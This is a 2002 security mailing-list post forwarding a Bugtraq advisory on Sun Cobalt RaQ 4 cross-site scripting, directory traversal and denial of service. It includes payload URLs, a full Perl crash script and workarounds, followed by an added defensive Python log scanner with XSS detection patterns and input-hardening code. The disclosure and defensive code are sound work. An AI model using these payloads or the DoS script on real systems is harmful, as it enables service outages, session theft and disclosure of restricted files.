
Re: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities



Who are those guys, publishing a full dos script?

Jelmer
----- Original Message -----
From: <cobalt@xxxxxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Friday, March 01, 2002 11:23 AM
Subject: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities


> This appeared in Bugtraq yesterday:
>
> --------------------------------------------------------------------
> From: Alex Hernandez <al3xhernandez@xxxxxxxxxx>
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Colbalt-RAQ-v4-Bugs&Vulnerabilities
> Date sent: Thu, 28 Feb 2002 09:33:17 -0500
> Send reply to: <al3xhernandez@xxxxxxxxxx>
>
>
> ------oOo----------------
> Cobalt RAQ 4 Server Management,
> Cross Site Scripting , Directory Traversal & DoS Vulnerabilities.
> ------oOo----------------
>
>
> Company Affected: www.cobalt.com & www.sun.com
> Version: RAQ 4 Server Management.
> Download: http://www.cobalt.com/products/raq/index.html
> OS Affected: Linux ALL, Solaris ALL.
>
>
> Author:
>
> ** Alex Hernandez <al3xhernandez@xxxxxxxxxx>
> ** Thanks all the people from Spain and Argentina.
> ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
>
>
> ----=[Brief Description]=------------
>
> The Sun Cobalt RaQ is a server appliance for Internet Service Providers
> (ISPs). It can host up to 200 individual websites or it can be dedicated
> to a single medium or large customer. This versatility opens up tremendous
> opportunity for service provider to invest in a single piece of hardware
> while migrating business customers up to dedicated servers.
>
>
> ----=[Summary]=----------------------
>
>
> Three vulnerabilities exist:
>
> a) Cross Site Scripting.
> b) Traversal vulnerabilities.
> c) Denial Of Service.(Exploit Released)
>
>
> Cobalt's service.cgi incorrectly handles the incoming search parameters:
> incoming HTML tags or JavaScript will be included inside the result
> without being filtered out for dangerous content. A similar problem
> occurs with x.cgi's inclusion of malicious code inside the resulting
> title search.
>
> The CGI files are open source. A security vulnerability in the
> product allows attackers to insert malicious content into existing web
> pages by exploiting the cross-site scripting vulnerability.
>
>
> Affected CGI files:
>
> alert.cgi
> service.cgi
>
>
> Workaround:
> 1) Delete service.cgi from the system, or disable its execution.
> 2) Delete alert.cgi from the system, or disable its execution.
>
>
> EXAMPLES:
>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft%20hole')</script>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>
>
> LOCATION:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E
>
> COOKIES:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> TAG IMAGES:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>
>
>
> WRITE ON DOCUMENT:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>
>
>
> ------oOo--------
>
> Traversal File configuration.
>
>
> Exploit:
> http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess
>
> # Access file for /usr/admserv/html/.cobalt/admin/ (admin  )
> order allow,deny
> allow from all
> require user admin
> Authname CobaltRaQ
> Authtype Basic
>
>
>
> The default directory on the server is "/usr/admserv/html/.cobalt/admin"; you can
> translate this to any directory to capture restricted files, passwords and
> user profiles.
>
>
> ------oOo--------
>
> Denial Of service.
>
>
> Proof Of concept:
>
> Server crashes after sending a very long URL:
>
> Example:
>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...
> (Ax100000)...AAA
>
>
> The system crashes and the admin needs to restart the service!
>
>
> ------oOo-------------
> Exploit Code DoS Cobalt4_DoS.pl
> ------oOo-------------
>
>
> #!/usr/bin/perl
> #
> # Simple script to send a long 'A's' command to the server,
> # resulting in the server crashing.
> #
> # Cobalt RAQ DoS v4 proof-of-concept exploit.
> # By Alex Hernandez <al3xhernandez@xxxxxxxxxx> (C)2002.
> #
> # Thanks all the people from Spain and Argentina.
> # Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
> #
> #
> # Usage: perl -x Cobalt4_DoS.pl -s <server>
> #
> # Example:
> #
> # perl -x Cobalt4_DoS.pl -s 10.0.0.1
> #
> # Crash was successful !
> #
>
> use Getopt::Std;
> use IO::Socket;
>
> print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");
> print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
>
> getopts('s:', \%args);
> if(!defined($args{s})){&usage;}
>
> ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);
>
> $def = "A";
> $num = "100000";
> $data .= $def x $num;
> $serv = $args{s};
> $port = 81;#maybe u define the port for diference of versions
> $buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data
> /HTTP/1.0\r\n\r\n";
>
>
> $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
> $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
> $proto = getprotobyname('tcp') || die("Error: $!\n");
>
> socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
> connect(S, $paddr) ||die ("Error: $!");
> select(S); $| = 1; select(STDOUT);
> print S "$buf";
>
>
> print("\nCrash was successful !\n\n");
>
> sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
>
>
>
> ------oOo------------------------------------
> Vendor Response:
> The vendor was notified
>
> Posted to the Cobalt security lists:
> cobalt-security@xxxxxxxxxxxxxxx &
> jlovell@xxxxxxx
>
> http://www.cobalt.com
> Temporary patch:
> Delete the CGI files from the system, or disable their
> execution.
>
> Alex Hernandez <al3xhernandez@xxxxxxxxxx> (c) 2002.
>
> ------oOo------------------------------------
>
>
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>
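Added editor's example, not part of this thread and not Cobalt's own code: a defender-side script that covers the three issues in the forwarded advisory. It screens access-log request lines for the traits the advisory describes (markup or script in the `service` parameter, `..` segments in the path, and over-long request targets), and shows the two fixes a maintainer of those CGIs would apply: HTML-escaping the echoed parameter and resolving client-supplied paths against a fixed base directory. The length threshold, the regex of markers, the `sysManage` directory and the log lines are all assumptions constructed here; only the `/usr/admserv/html/.cobalt` prefix comes from the advisory.

```python
import posixpath
import re
from html import escape
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed values (not from the advisory except the .cobalt directory prefix).
MAX_TARGET_LEN = 2048                                  # tolerated request-target length
SYSMANAGE_DIR = "/usr/admserv/html/.cobalt/sysManage"  # assumed document root of that area

# Markers of active content in a parameter that should only carry a service name.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|iframe|svg)\b|javascript:|on\w+\s*=", re.I)

# Apache common-log request field: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def classify_target(target: str) -> List[str]:
    """Return the suspicious traits of one request-target (path plus query)."""
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversize")          # the advisory's long-URL crash
    parts = urlsplit(target)
    # Decode twice so %252e-style double encoding cannot hide a '..' segment.
    decoded_path = unquote(unquote(parts.path))
    if ".." in decoded_path.split("/"):
        findings.append("traversal")         # sysManage/../admin/.htaccess
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        if any(XSS_MARKERS.search(unquote(v)) for v in values):
            findings.append("xss")           # <script> in service=...
            break
    return findings


def scan_log(text: str) -> List[Tuple[int, List[str]]]:
    """Return (line number, findings) for every log line that trips a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_target(m.group("target"))
        if findings:
            hits.append((n, findings))
    return hits


def render_service(service: str) -> str:
    """Hardened way to echo the 'service' parameter: cap its length, then HTML-escape it."""
    return "<title>Service: %s</title>" % escape(service[:64], quote=True)


def safe_resolve(base_dir: str, requested: str) -> Optional[str]:
    """Map a client-supplied relative path under base_dir; refuse anything that escapes it."""
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, unquote(requested)))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


# Constructed sample traffic modelled on the advisory's example URLs; not real logs.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Mar/2002:11:23:00 -0500] "GET /cgi-bin/.cobalt/alert/service.cgi?service=httpd HTTP/1.0" 200 512',
    '10.0.0.5 - - [01/Mar/2002:11:23:01 -0500] "GET /cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0" 200 640',
    '10.0.0.5 - - [01/Mar/2002:11:23:02 -0500] "GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 200 210',
    '10.0.0.5 - - [01/Mar/2002:11:23:03 -0500] "GET /cgi-bin/.cobalt/alert/service.cgi?service=/%s HTTP/1.0" 500 0' % ("A" * 100000),
])

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (n, ", ".join(findings)))
    print(render_service("<script>alert(document.cookie)</script>"))
    print(safe_resolve(SYSMANAGE_DIR, "../admin/.htaccess"))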